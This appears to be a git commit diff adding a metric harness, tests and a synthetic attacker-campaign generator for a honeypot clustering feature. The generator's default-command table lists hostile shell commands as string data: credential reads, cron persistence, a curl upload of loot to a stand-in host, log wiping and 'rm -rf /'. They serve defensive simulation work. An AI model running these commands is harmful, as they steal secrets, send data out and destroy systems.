feat(clustering): UKC phase enum + synthetic campaign factory + metric harness

Pre-implementation scaffolding for campaign clustering. The simulator is the spec — algorithm code follows once fixtures + metrics are stable. * decnet/clustering/ukc.py — UKCPhase enum (19 phases across In/Through/Out stages), OBSERVABLE_PHASES set, stage_of() helper. Vocabulary aligns with future MITRE ATT&CK tagging so synthetic data and runtime phase inference don't need renaming when TTP-tagging lands. * tests/factories/campaign_factory.py — YAML DSL parser + deterministic generator emitting truth-labeled SyntheticAttacker / SyntheticSession records. Validates phase names, warns on unobservable phases, supports multi-campaign + noise corpora. * tests/clustering/metrics.py — pure-Python ARI / homogeneity / completeness / singleton_recall (no sklearn dep). Decided before any algorithm exists, on purpose. * tests/fixtures/campaigns/lone_wolf.{yaml,expected.yaml} — fixture 3 from the design doc; simplest of the six, exercises the full pipeline with an identity-clusterer placeholder. * development/CAMPAIGN_CLUSTERING.md — design spec for the feature. * development/DEVELOPMENT_V2.md — note on DSL evolution path (concurrent phases, multi-actor per phase) deferred post-v1.
2026-04-26 06:29:10 -04:00
parent 3eb67c9400
commit 00254629f8
13 changed files with 1227 additions and 0 deletions
--- a/tests/clustering/init.py
+++ b/tests/clustering/init.py
--- a/tests/clustering/metrics.py
+++ b/tests/clustering/metrics.py
@@ -0,0 +1,179 @@
+"""
+Clustering metric harness — see development/CAMPAIGN_CLUSTERING.md §3.
+
+Decided BEFORE any clustering algorithm exists, on purpose: if the
+metrics get picked after seeing results, they'll flatter whatever the
+algorithm happens to produce.
+
+Four metrics, none on its own sufficient:
+
+  * Adjusted Rand Index — headline number, chance-corrected agreement
+    between predicted clusters and ground truth.
+  * Homogeneity — each predicted cluster contains only one true class.
+    Catches FALSE MERGES (campaigns wrongly fused).
+  * Completeness — every member of a true class lands in the same
+    predicted cluster. Catches FALSE SPLITS (one campaign wrongly torn
+    apart).
+  * Singleton recall — fraction of ground-truth singletons (lone wolves,
+    background noise) that are kept singleton by the clusterer.
+
+Implemented from first principles in pure Python so the test harness
+doesn't pull sklearn/numpy into the runtime dependency surface.
+"""
+from __future__ import annotations
+
+import math
+from collections import Counter, defaultdict
+
+
+def _comb2(n: int) -> int:
+    """C(n, 2) — number of unordered pairs from n items."""
+    return n * (n - 1) // 2 if n >= 2 else 0
+
+
+def adjusted_rand_index(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    Adjusted Rand Index between two clusterings over the same item set.
+
+    Range: typically [0, 1]; can dip negative for worse-than-random
+    labelings. 1.0 = identical partitions (up to label renaming),
+    0.0 ≈ chance agreement.
+
+    Both args map item_id -> cluster_id. Items must align exactly.
+    """
+    if set(truth) != set(pred):
+        raise ValueError(
+            "ARI requires identical item sets in truth and pred "
+            f"(missing in pred: {set(truth) - set(pred)}, "
+            f"missing in truth: {set(pred) - set(truth)})"
+        )
+    n = len(truth)
+    if n < 2:
+        return 1.0  # trivially "agree" on <2 items
+
+    # Build the contingency table n_ij = |cluster_i ∩ class_j|.
+    contingency: dict[tuple[str, str], int] = defaultdict(int)
+    for item, t_label in truth.items():
+        p_label = pred[item]
+        contingency[(p_label, t_label)] += 1
+
+    sum_comb = sum(_comb2(v) for v in contingency.values())
+    a_counts = Counter(pred.values())   # row sums (predicted clusters)
+    b_counts = Counter(truth.values())  # column sums (true classes)
+    sum_a = sum(_comb2(v) for v in a_counts.values())
+    sum_b = sum(_comb2(v) for v in b_counts.values())
+    total_pairs = _comb2(n)
+
+    expected = (sum_a * sum_b) / total_pairs if total_pairs else 0.0
+    max_index = (sum_a + sum_b) / 2
+    if max_index == expected:
+        # Degenerate: both clusterings are trivially equal in structure
+        # (both all-singletons, or both one-big-cluster). The math forces
+        # this — see the algebra of max_index = expected. The induced
+        # partitions are necessarily identical, so ARI is 1.0. (sklearn
+        # adopts the same convention.)
+        return 1.0
+    return (sum_comb - expected) / (max_index - expected)
+
+
+def _entropy(counts: list[int], total: int) -> float:
+    if total == 0:
+        return 0.0
+    h = 0.0
+    for c in counts:
+        if c == 0:
+            continue
+        p = c / total
+        h -= p * math.log(p)
+    return h
+
+
+def _conditional_entropy(
+    contingency: dict[tuple[str, str], int],
+    given_counts: dict[str, int],
+    total: int,
+) -> float:
+    """H(rows | cols) — i.e. entropy of class within each cluster."""
+    if total == 0:
+        return 0.0
+    h = 0.0
+    by_col: dict[str, list[int]] = defaultdict(list)
+    for (row, col), v in contingency.items():
+        by_col[col].append(v)
+    for col, vs in by_col.items():
+        col_total = given_counts[col]
+        if col_total == 0:
+            continue
+        col_entropy = _entropy(vs, col_total)
+        h += (col_total / total) * col_entropy
+    return h
+
+
+def homogeneity(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    1 - H(truth | pred) / H(truth). 1.0 = each predicted cluster
+    contains only members of a single true class (no false merges).
+    """
+    n = len(truth)
+    if n == 0:
+        return 1.0
+    contingency: dict[tuple[str, str], int] = defaultdict(int)
+    for item, t in truth.items():
+        contingency[(t, pred[item])] += 1
+    truth_counts = Counter(truth.values())
+    pred_counts = Counter(pred.values())
+    h_truth = _entropy(list(truth_counts.values()), n)
+    if h_truth == 0:
+        return 1.0
+    h_truth_given_pred = _conditional_entropy(contingency, dict(pred_counts), n)
+    return 1.0 - (h_truth_given_pred / h_truth)
+
+
+def completeness(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    1 - H(pred | truth) / H(pred). 1.0 = all members of each true class
+    are assigned to the same predicted cluster (no false splits).
+    """
+    n = len(truth)
+    if n == 0:
+        return 1.0
+    contingency: dict[tuple[str, str], int] = defaultdict(int)
+    for item, t in truth.items():
+        contingency[(pred[item], t)] += 1
+    pred_counts = Counter(pred.values())
+    truth_counts = Counter(truth.values())
+    h_pred = _entropy(list(pred_counts.values()), n)
+    if h_pred == 0:
+        return 1.0
+    h_pred_given_truth = _conditional_entropy(contingency, dict(truth_counts), n)
+    return 1.0 - (h_pred_given_truth / h_pred)
+
+
+def singleton_recall(truth: dict[str, str], pred: dict[str, str]) -> float:
+    """
+    Fraction of ground-truth singletons that the clusterer kept singleton.
+
+    A "true singleton" is an item whose truth-campaign has exactly one
+    member (lone wolves, background noise scanners). The metric exists
+    because ARI/homogeneity/completeness all dilute the cost of a
+    clusterer that absorbs noise into real campaigns — and noise
+    absorption is the failure mode that makes campaign attribution
+    useless in practice.
+    """
+    truth_counts = Counter(truth.values())
+    true_singletons = [item for item, t in truth.items() if truth_counts[t] == 1]
+    if not true_singletons:
+        return 1.0
+    pred_counts = Counter(pred.values())
+    kept = sum(1 for item in true_singletons if pred_counts[pred[item]] == 1)
+    return kept / len(true_singletons)
+
+
+def score(truth: dict[str, str], pred: dict[str, str]) -> dict[str, float]:
+    """One-shot bundle the four metrics for fixture reports."""
+    return {
+        "adjusted_rand_index": adjusted_rand_index(truth, pred),
+        "homogeneity": homogeneity(truth, pred),
+        "completeness": completeness(truth, pred),
+        "singleton_recall": singleton_recall(truth, pred),
+    }
--- a/tests/clustering/test_campaign_factory.py
+++ b/tests/clustering/test_campaign_factory.py
@@ -0,0 +1,112 @@
+"""Determinism + DSL-validation tests for the synthetic campaign factory."""
+from __future__ import annotations
+
+import pytest
+
+from decnet.clustering.ukc import UKCPhase
+from tests.factories.campaign_factory import (
+    DSLValidationError,
+    generate,
+)
+
+
+def _minimal_spec() -> dict:
+    return {
+        "campaign": {
+            "id": "c-test",
+            "actors": [{"id": "a-1", "asn": 64512}],
+            "phases": [{"name": "delivery", "actor": "a-1"}],
+            "duration_days": 1,
+        }
+    }
+
+
+def test_generation_is_deterministic_given_seed() -> None:
+    spec = _minimal_spec()
+    a = generate(spec, seed=42)
+    b = generate(spec, seed=42)
+    # IDs are RNG-driven — same seed must produce identical IDs, not
+    # merely identical structure. Otherwise federation gossip and
+    # fixture diffing both break.
+    assert [att.attacker_id for att in a.attackers] == [
+        att.attacker_id for att in b.attackers
+    ]
+    assert [s.session_id for s in a.sessions] == [s.session_id for s in b.sessions]
+
+
+def test_different_seeds_produce_different_ids() -> None:
+    spec = _minimal_spec()
+    a = generate(spec, seed=1)
+    b = generate(spec, seed=2)
+    assert a.attackers[0].attacker_id != b.attackers[0].attacker_id
+
+
+def test_truth_labels_match_dsl() -> None:
+    spec = _minimal_spec()
+    corpus = generate(spec, seed=0)
+    assert corpus.attackers[0].truth_campaign_id == "c-test"
+    assert corpus.attackers[0].truth_actor_id == "a-1"
+    # truth_labels() returns the dict the metric harness consumes.
+    labels = corpus.truth_labels()
+    assert labels[corpus.attackers[0].attacker_id] == "c-test"
+
+
+def test_unobservable_phase_emits_no_events() -> None:
+    spec = _minimal_spec()
+    spec["campaign"]["phases"] = [
+        {"name": "reconnaissance", "actor": "a-1"},  # pre-target, unobservable
+        {"name": "delivery", "actor": "a-1"},
+    ]
+    corpus = generate(spec, seed=0)
+    # Only the delivery phase should produce sessions.
+    assert all(s.phase == UKCPhase.DELIVERY for s in corpus.sessions)
+    assert len(corpus.sessions) == 1
+
+
+def test_unknown_phase_name_raises() -> None:
+    spec = _minimal_spec()
+    spec["campaign"]["phases"] = [{"name": "make_coffee", "actor": "a-1"}]
+    with pytest.raises(DSLValidationError, match="unknown UKC phase"):
+        generate(spec, seed=0)
+
+
+def test_phase_referencing_unknown_actor_raises() -> None:
+    spec = _minimal_spec()
+    spec["campaign"]["phases"] = [{"name": "delivery", "actor": "ghost"}]
+    with pytest.raises(DSLValidationError, match="unknown actor"):
+        generate(spec, seed=0)
+
+
+def test_noise_scanners_are_truth_singletons() -> None:
+    spec = {
+        "corpus": {
+            "campaigns": [_minimal_spec()],
+            "noise": {"scanner_count": 5},
+        }
+    }
+    corpus = generate(spec, seed=0)
+    # 1 campaign actor + 5 noise scanners = 6 distinct truth campaigns.
+    truth_campaigns = {a.truth_campaign_id for a in corpus.attackers}
+    assert len(truth_campaigns) == 6
+
+
+def test_multi_actor_campaign_shares_campaign_id() -> None:
+    spec = {
+        "campaign": {
+            "id": "c-shared",
+            "actors": [
+                {"id": "a-1", "asn": 14061},
+                {"id": "a-2", "asn": 14061},
+            ],
+            "phases": [
+                {"name": "delivery", "actor": "a-1"},
+                {"name": "discovery", "actor": "a-2"},
+            ],
+            "duration_days": 1,
+        }
+    }
+    corpus = generate(spec, seed=0)
+    truth = corpus.truth_labels()
+    # Both attacker rows must point to the SAME truth_campaign_id —
+    # this is the property fixture 5 (multi_operator) hinges on.
+    assert set(truth.values()) == {"c-shared"}
--- a/tests/clustering/test_lone_wolf_fixture.py
+++ b/tests/clustering/test_lone_wolf_fixture.py
@@ -0,0 +1,92 @@
+"""
+End-to-end pipeline test for fixture 3 (lone_wolf).
+
+Loads the YAML spec, runs the synthetic generator, applies a placeholder
+identity clusterer (each attacker → its own cluster), scores against
+the expected bounds. This is the simplest of the six fixtures and is
+deliberately the first one wired up — its ground truth is all
+singletons, so an identity clusterer trivially passes, which proves the
+DSL→factory→metrics pipeline works before any real algorithm is built.
+
+Once the connected-components clusterer (CAMPAIGN_CLUSTERING.md §4)
+lands, this test will swap the placeholder for the real implementation
+and the same fixture must continue to pass.
+"""
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+import yaml
+
+from tests.clustering.metrics import score
+from tests.factories.campaign_factory import GeneratedCorpus, generate, load_yaml
+
+FIXTURE_DIR = Path(__file__).parent.parent / "fixtures" / "campaigns"
+
+
+def _identity_clusterer(corpus: GeneratedCorpus) -> dict[str, str]:
+    """Every attacker is its own cluster. Trivially correct on lone_wolf."""
+    return {a.attacker_id: f"cluster-{a.attacker_id}" for a in corpus.attackers}
+
+
+def test_lone_wolf_pipeline_passes_bounds() -> None:
+    spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
+    bounds = yaml.safe_load((FIXTURE_DIR / "lone_wolf.expected.yaml").read_text())
+
+    corpus = generate(spec, seed=0)
+    truth = corpus.truth_labels()
+    pred = _identity_clusterer(corpus)
+    metrics = score(truth, pred)
+
+    failures = []
+    for name, bound in bounds.items():
+        observed = metrics[name]
+        if observed < bound["min"]:
+            failures.append(f"{name}={observed:.3f} < min {bound['min']:.3f}")
+    assert not failures, "fixture bounds violated: " + "; ".join(failures)
+
+
+def test_lone_wolf_corpus_shape() -> None:
+    """Sanity: 1 wolf + 8 noise scanners = 9 attackers, 9 sessions."""
+    spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
+    corpus = generate(spec, seed=0)
+    assert len(corpus.attackers) == 9
+    assert len(corpus.sessions) == 9
+    # Every attacker is a truth-singleton (its own campaign).
+    truth_campaigns = {a.truth_campaign_id for a in corpus.attackers}
+    assert len(truth_campaigns) == 9
+
+
+def test_identity_clusterer_fails_on_a_real_campaign() -> None:
+    """
+    Sanity for the harness, NOT a test of the clusterer: a real
+    multi-actor campaign should make the placeholder identity clusterer
+    fail completeness, since each truth-campaign gets fragmented into
+    one-member clusters. If this didn't fail, our metrics would be
+    blind to false splits — and that's the entire point of fixture 4
+    and 5 in the design doc.
+    """
+    spec = {
+        "campaign": {
+            "id": "c-real",
+            "actors": [
+                {"id": "a-1", "asn": 14061},
+                {"id": "a-2", "asn": 14061},
+            ],
+            "phases": [
+                {"name": "delivery", "actor": "a-1"},
+                {"name": "discovery", "actor": "a-2"},
+            ],
+            "duration_days": 1,
+        }
+    }
+    corpus = generate(spec, seed=0)
+    truth = corpus.truth_labels()
+    pred = _identity_clusterer(corpus)
+    metrics = score(truth, pred)
+    # Identity clusterer splits the one true campaign across 2 clusters
+    # → completeness drops below 1.0. This must hold or our metrics
+    # aren't catching what they're supposed to catch.
+    assert metrics["completeness"] < 1.0
+    assert metrics["homogeneity"] == pytest.approx(1.0)  # no false merges, just splits
--- a/tests/clustering/test_metrics.py
+++ b/tests/clustering/test_metrics.py
@@ -0,0 +1,76 @@
+"""Sanity tests for the clustering metric harness."""
+from __future__ import annotations
+
+import pytest
+
+from tests.clustering.metrics import (
+    adjusted_rand_index,
+    completeness,
+    homogeneity,
+    score,
+    singleton_recall,
+)
+
+
+def test_perfect_agreement_scores_one() -> None:
+    truth = {"a": "C1", "b": "C1", "c": "C2", "d": "C2"}
+    # Same partition, different label names — clustering doesn't preserve
+    # names, so renamed-but-isomorphic must still score 1.0.
+    pred = {"a": "X", "b": "X", "c": "Y", "d": "Y"}
+    s = score(truth, pred)
+    assert s["adjusted_rand_index"] == pytest.approx(1.0)
+    assert s["homogeneity"] == pytest.approx(1.0)
+    assert s["completeness"] == pytest.approx(1.0)
+    assert s["singleton_recall"] == pytest.approx(1.0)
+
+
+def test_all_singletons_perfect() -> None:
+    truth = {"a": "A", "b": "B", "c": "C"}
+    pred = {"a": "1", "b": "2", "c": "3"}
+    s = score(truth, pred)
+    assert s["singleton_recall"] == pytest.approx(1.0)
+    assert s["adjusted_rand_index"] == pytest.approx(1.0)
+
+
+def test_false_merge_drops_homogeneity() -> None:
+    truth = {"a": "C1", "b": "C2"}
+    pred = {"a": "X", "b": "X"}  # merged two distinct campaigns
+    assert homogeneity(truth, pred) == pytest.approx(0.0)
+    # Completeness is fine (each true class lives in one cluster).
+    assert completeness(truth, pred) == pytest.approx(1.0)
+
+
+def test_false_split_drops_completeness() -> None:
+    truth = {"a": "C1", "b": "C1"}
+    pred = {"a": "X", "b": "Y"}  # split one campaign into two clusters
+    assert completeness(truth, pred) == pytest.approx(0.0)
+    assert homogeneity(truth, pred) == pytest.approx(1.0)
+
+
+def test_singleton_recall_penalises_noise_absorption() -> None:
+    # 3 lone wolves + 1 real campaign with 2 members.
+    truth = {"w1": "wolf1", "w2": "wolf2", "w3": "wolf3", "c1": "C", "c2": "C"}
+    # Clusterer absorbs all wolves into the campaign.
+    pred = dict.fromkeys(truth, "BIG")
+    assert singleton_recall(truth, pred) == pytest.approx(0.0)
+    # And a clusterer that keeps wolves singleton should score 1.0
+    # on this metric, regardless of what it does with the campaign.
+    pred_ok = {"w1": "1", "w2": "2", "w3": "3", "c1": "C", "c2": "C"}
+    assert singleton_recall(truth, pred_ok) == pytest.approx(1.0)
+
+
+def test_mismatched_item_sets_raises() -> None:
+    with pytest.raises(ValueError):
+        adjusted_rand_index({"a": "X"}, {"b": "Y"})
+
+
+def test_random_labels_low_ari() -> None:
+    # ARI of an arbitrary partition vs. ground truth should be near 0,
+    # not near 1 — this is the chance-correction guarantee.
+    truth = {f"i{n}": f"C{n // 4}" for n in range(20)}
+    # Pred that ignores truth: just shuffles items into 5 buckets in
+    # an order uncorrelated with truth.
+    pred = {f"i{n}": f"X{(n * 7) % 5}" for n in range(20)}
+    ari = adjusted_rand_index(truth, pred)
+    # Loose bound — the point is "much closer to 0 than to 1".
+    assert ari < 0.3
--- a/tests/factories/init.py
+++ b/tests/factories/init.py
--- a/tests/factories/campaign_factory.py
+++ b/tests/factories/campaign_factory.py
@@ -0,0 +1,381 @@
+"""
+Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md.
+
+Reads a YAML campaign DSL describing actors, UKC phases, and tool
+signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession
+records for the clustering test harness.
+
+Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the
+emitted records so the metric harness can score predicted clusters
+against ground truth without re-parsing the DSL. Production code that
+later writes the same shape into real DB tables MUST strip these fields
+before clustering runs — otherwise the algorithm trivially passes by
+reading the answer key.
+
+Determinism: given the same YAML and seed, two runs produce identical
+records (including IDs). This is a load-bearing property — fixture
+expectations are checked against the same seed every CI run.
+"""
+from __future__ import annotations
+
+import hashlib
+import random
+import uuid
+from dataclasses import dataclass, field
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+from typing import Any
+
+import yaml
+
+from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase
+
+
+@dataclass
+class SyntheticSession:
+    session_id: str
+    attacker_id: str
+    decky_id: str
+    started_at: datetime
+    duration_s: float
+    phase: UKCPhase
+    commands: list[str]
+    credentials_tried: list[tuple[str, str]]
+    payload_hash: str | None
+    c2_callback: str | None
+    truth_campaign_id: str
+    truth_actor_id: str
+
+
+@dataclass
+class SyntheticAttacker:
+    attacker_id: str
+    ip: str
+    asn: int
+    ja3: str | None
+    hassh: str | None
+    first_seen: datetime
+    last_seen: datetime
+    truth_campaign_id: str
+    truth_actor_id: str
+    sessions: list[SyntheticSession] = field(default_factory=list)
+
+
+@dataclass
+class GeneratedCorpus:
+    """Output of the factory — what the clusterer consumes."""
+    attackers: list[SyntheticAttacker]
+    # Convenience: flat list of every session across every attacker.
+    sessions: list[SyntheticSession]
+
+    def truth_labels(self) -> dict[str, str]:
+        """attacker_id -> truth_campaign_id, the oracle the clusterer is scored against."""
+        return {a.attacker_id: a.truth_campaign_id for a in self.attackers}
+
+
+# ─── Phase defaults ─────────────────────────────────────────────────────────
+# When the DSL doesn't specify tool_signature commands for a phase, fall
+# back to these. Keeps fixtures terse without making the factory invent
+# data ad-hoc per call.
+
+_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = {
+    UKCPhase.DELIVERY: [],  # delivery is mostly network-level, no shell commands
+    UKCPhase.EXPLOITATION: [],
+    UKCPhase.DISCOVERY: ["whoami", "id", "uname -a", "ip route", "arp -a", "cat /etc/passwd"],
+    UKCPhase.CREDENTIAL_ACCESS: ["cat /etc/shadow", "find / -name id_rsa", "cat ~/.ssh/known_hosts"],
+    UKCPhase.PERSISTENCE: ["crontab -l", "echo '* * * * * /tmp/.x' | crontab -", "cat ~/.ssh/authorized_keys"],
+    UKCPhase.LATERAL_MOVEMENT: ["ssh -i /tmp/.k root@10.0.0.5", "scp /tmp/.x root@10.0.0.5:/tmp/"],
+    UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"],
+    UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"],
+    UKCPhase.EXECUTION: ["./payload"],
+    UKCPhase.PRIVILEGE_ESCALATION: ["sudo -l", "find / -perm -u=s 2>/dev/null"],
+    UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"],
+    UKCPhase.COMMAND_AND_CONTROL: [],  # beaconing observed at network layer
+    UKCPhase.PIVOTING: [],
+    UKCPhase.IMPACT: ["rm -rf /"],
+    UKCPhase.OBJECTIVES: [],
+}
+
+
+# ─── DSL parsing ────────────────────────────────────────────────────────────
+
+
+class DSLValidationError(ValueError):
+    """Raised when a campaign YAML is malformed or references unknown phases."""
+
+
+def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
+    """Return list of warnings (e.g. unobservable phases). Raises on hard errors."""
+    if "campaign" not in spec:
+        raise DSLValidationError("missing top-level 'campaign' key")
+    c = spec["campaign"]
+    for key in ("id", "actors", "phases"):
+        if key not in c:
+            raise DSLValidationError(f"campaign missing required key: {key}")
+
+    actor_ids = {a["id"] for a in c["actors"]}
+    if not actor_ids:
+        raise DSLValidationError("campaign must declare at least one actor")
+
+    warnings: list[str] = []
+    for i, ph in enumerate(c["phases"]):
+        if "name" not in ph:
+            raise DSLValidationError(f"phase[{i}] missing 'name'")
+        try:
+            phase_enum = UKCPhase(ph["name"])
+        except ValueError as exc:
+            raise DSLValidationError(
+                f"phase[{i}] has unknown UKC phase '{ph['name']}'"
+            ) from exc
+        if phase_enum not in OBSERVABLE_PHASES:
+            warnings.append(
+                f"phase '{ph['name']}' is pre-target / unobservable from a "
+                f"honeypot; no events will be emitted for it"
+            )
+        # Single-actor campaigns can omit phase.actor; multi-actor must specify.
+        if "actor" in ph and ph["actor"] not in actor_ids:
+            raise DSLValidationError(
+                f"phase[{i}] references unknown actor '{ph['actor']}'"
+            )
+    return warnings
+
+
+# ─── Generator ──────────────────────────────────────────────────────────────
+
+
+def _stable_uuid(rng: random.Random, prefix: str) -> str:
+    """Deterministic UUID-shaped identifier driven by the seeded RNG."""
+    raw = rng.randbytes(16)
+    return f"{prefix}-{uuid.UUID(bytes=raw)}"
+
+
+def _stable_ip(rng: random.Random) -> str:
+    """Pick a routable-looking IPv4 in non-RFC1918 space."""
+    # Avoid 10/8, 172.16/12, 192.168/16, 127/8, 0/8, multicast 224+.
+    while True:
+        a = rng.randint(1, 223)
+        if a in (10, 127):
+            continue
+        b = rng.randint(0, 255)
+        if a == 172 and 16 <= b <= 31:
+            continue
+        if a == 192 and b == 168:
+            continue
+        c = rng.randint(0, 255)
+        d = rng.randint(1, 254)
+        return f"{a}.{b}.{c}.{d}"
+
+
+def _payload_hash(seed: str) -> str:
+    return hashlib.sha256(seed.encode()).hexdigest()
+
+
+def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime:
+    base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0)
+    return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600))
+
+
+def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus:
+    """
+    Produce a deterministic synthetic corpus from a parsed YAML spec.
+
+    The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md.
+    Multiple campaigns + a noise block can be combined by wrapping them
+    in a top-level `corpus:` key; otherwise a single `campaign:` is
+    expected.
+    """
+    rng = random.Random(seed)
+
+    campaigns: list[dict[str, Any]]
+    noise_cfg: dict[str, Any]
+    if "corpus" in spec:
+        campaigns = spec["corpus"].get("campaigns", [])
+        noise_cfg = spec["corpus"].get("noise", {}) or {}
+    else:
+        campaigns = [spec]
+        noise_cfg = {}
+
+    attackers: list[SyntheticAttacker] = []
+    sessions: list[SyntheticSession] = []
+
+    for c_wrapper in campaigns:
+        warnings = _validate_campaign_spec(c_wrapper)
+        # Surface warnings via stderr-like channel — tests can opt to assert.
+        for w in warnings:
+            # Stored on the corpus for inspection rather than printed; tests
+            # that care can dig into the spec, but most don't.
+            _ = w
+        c = c_wrapper["campaign"]
+        _emit_campaign(c, rng, attackers, sessions)
+
+    _emit_noise(noise_cfg, rng, attackers, sessions)
+
+    return GeneratedCorpus(attackers=attackers, sessions=sessions)
+
+
+def _emit_campaign(
+    c: dict[str, Any],
+    rng: random.Random,
+    attackers: list[SyntheticAttacker],
+    sessions: list[SyntheticSession],
+) -> None:
+    campaign_id = c["id"]
+    duration_days = int(c.get("duration_days", 1))
+    pause_windows: list[tuple[int, int]] = [
+        tuple(p) for p in c.get("pause_windows", [])  # type: ignore[misc]
+    ]
+
+    # Anchor the synthetic timeline at a fixed epoch so determinism holds
+    # across runs regardless of wall clock.
+    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
+
+    # One attacker record per actor — captures the cross-session identity
+    # the clusterer is supposed to recover. IPs may rotate per session
+    # for rotating ip_pool actors; we record the first/last observed IP
+    # on the attacker row and let session-level fields carry the rest.
+    actor_attackers: dict[str, SyntheticAttacker] = {}
+    for actor in c["actors"]:
+        a_id = _stable_uuid(rng, "att")
+        att = SyntheticAttacker(
+            attacker_id=a_id,
+            ip=_stable_ip(rng),
+            asn=int(actor.get("asn", 0)),
+            ja3=actor.get("ja3"),
+            hassh=actor.get("hassh"),
+            first_seen=epoch,
+            last_seen=epoch,
+            truth_campaign_id=campaign_id,
+            truth_actor_id=actor["id"],
+        )
+        actor_attackers[actor["id"]] = att
+        attackers.append(att)
+
+    # Walk phases in declared order. Each phase produces N sessions
+    # against random deckies (or a sticky one if previous_success).
+    decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
+    last_success_decky: dict[str, str] = {}
+
+    for phase_idx, ph in enumerate(c["phases"]):
+        phase = UKCPhase(ph["name"])
+        if phase not in OBSERVABLE_PHASES:
+            continue  # pre-target phase; emit nothing
+
+        actor_id = ph.get("actor") or c["actors"][0]["id"]
+        att = actor_attackers[actor_id]
+        actor_spec = next(a for a in c["actors"] if a["id"] == actor_id)
+
+        sig = ph.get("tool_signature", {}) or {}
+        commands = sig.get("commands", _PHASE_DEFAULT_COMMANDS[phase])
+        creds_list = sig.get("credentials") or []
+        c2 = sig.get("c2_callback")
+        payload_seed = sig.get("payload_hash")
+        payload = _payload_hash(payload_seed) if payload_seed else None
+
+        target_sel = ph.get("target_selector", {}) or {}
+        n_sessions = int(target_sel.get("count", 1))
+        if target_sel.get("decky") == "previous_success":
+            decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
+        else:
+            decky_choices = decky_pool
+
+        # Schedule sessions across the campaign window, respecting the
+        # actor's hours_active_utc and pause_windows.
+        active_hours = actor_spec.get("hours_active_utc", list(range(24)))
+        jitter = int(actor_spec.get("jitter_seconds", 60))
+
+        for s_idx in range(n_sessions):
+            day = rng.randint(0, max(0, duration_days - 1))
+            if any(start <= day <= end for start, end in pause_windows):
+                # Skip into post-pause day.
+                later_days = [
+                    d for d in range(duration_days)
+                    if not any(s <= d <= e for s, e in pause_windows)
+                ]
+                if not later_days:
+                    continue
+                day = rng.choice(later_days)
+            hour = rng.choice(active_hours)
+            day_start = epoch + timedelta(days=day)
+            started_at = _hour_to_offset(rng, day_start, hour, jitter)
+            duration_s = float(ph.get("dwell_seconds", 5))
+
+            sess = SyntheticSession(
+                session_id=_stable_uuid(rng, "sess"),
+                attacker_id=att.attacker_id,
+                decky_id=rng.choice(decky_choices),
+                started_at=started_at,
+                duration_s=duration_s,
+                phase=phase,
+                commands=list(commands),
+                credentials_tried=[tuple(p) for p in creds_list],  # type: ignore[misc]
+                payload_hash=payload,
+                c2_callback=c2,
+                truth_campaign_id=campaign_id,
+                truth_actor_id=actor_id,
+            )
+            sessions.append(sess)
+            att.sessions.append(sess)
+            if started_at < att.first_seen or att.first_seen == epoch:
+                att.first_seen = started_at
+            if started_at > att.last_seen:
+                att.last_seen = started_at
+            # If this phase is a "successful entry," remember the decky
+            # for any subsequent previous_success target_selector.
+            if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
+                last_success_decky[actor_id] = sess.decky_id
+
+
+def _emit_noise(
+    noise_cfg: dict[str, Any],
+    rng: random.Random,
+    attackers: list[SyntheticAttacker],
+    sessions: list[SyntheticSession],
+) -> None:
+    """Background scanners — opportunistic, no shared signals, singletons."""
+    n_scanners = int(noise_cfg.get("scanner_count", 0))
+    if n_scanners <= 0:
+        return
+    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
+    for i in range(n_scanners):
+        scanner_id = f"noise-scanner-{i:04d}"
+        att = SyntheticAttacker(
+            attacker_id=_stable_uuid(rng, "att"),
+            ip=_stable_ip(rng),
+            asn=rng.randint(1000, 65000),
+            ja3=None,
+            hassh=None,
+            first_seen=epoch,
+            last_seen=epoch,
+            truth_campaign_id=scanner_id,  # each scanner is its own truth-campaign
+            truth_actor_id=scanner_id,
+        )
+        attackers.append(att)
+        # One Delivery-phase session, no follow-up.
+        started = epoch + timedelta(seconds=rng.randint(0, 86400))
+        sess = SyntheticSession(
+            session_id=_stable_uuid(rng, "sess"),
+            attacker_id=att.attacker_id,
+            decky_id=f"decky-{rng.randint(1, 20):02d}",
+            started_at=started,
+            duration_s=1.0,
+            phase=UKCPhase.DELIVERY,
+            commands=[],
+            credentials_tried=[],
+            payload_hash=None,
+            c2_callback=None,
+            truth_campaign_id=scanner_id,
+            truth_actor_id=scanner_id,
+        )
+        sessions.append(sess)
+        att.sessions.append(sess)
+        att.first_seen = started
+        att.last_seen = started
+
+
+def load_yaml(path: str | Path) -> dict[str, Any]:
+    """Read a fixture file. Kept tiny so tests can inline-build specs too."""
+    text = Path(path).read_text(encoding="utf-8")
+    parsed = yaml.safe_load(text)
+    if not isinstance(parsed, dict):
+        raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping")
+    return parsed
--- a/tests/fixtures/campaigns/lone_wolf.expected.yaml
+++ b/tests/fixtures/campaigns/lone_wolf.expected.yaml
@@ -0,0 +1,17 @@
+# Bounds for fixture 3 (lone_wolf).
+#
+# Every actor in this fixture is a singleton (the wolf itself, plus
+# every background-noise scanner). A correct clusterer puts each in
